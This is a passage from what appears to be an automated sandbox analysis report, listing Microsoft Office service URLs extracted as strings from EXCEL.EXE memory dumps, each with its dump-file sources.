Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/#
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://dev0-api.acompli.net/autodetectX
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://devnull.onenote.comBearer
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://devnull.onenote.comC
Source: EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://devnull.onenote.comMBI_SSL_SHORT
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://directory.services.
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://enrichment.osi.office.net/$
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://enrichment.osi.office.net/2
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://enrichment.osi.office.net/?
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1AuthorizationBearer
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1s
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1EnrichmentWACUrlhttps://enrichment.osi.
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1b
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/EnrichmentMetadataUrlhttps://enrichm
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/Q
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml7Kv
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtmlEnrichmentDisambiguat
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://enrichment.osi.office.net/f
Source: EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://enrichment.osi.office.net/https://login.windows.net/common/oauth2/authorizeMBI_SSLhttps://os
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 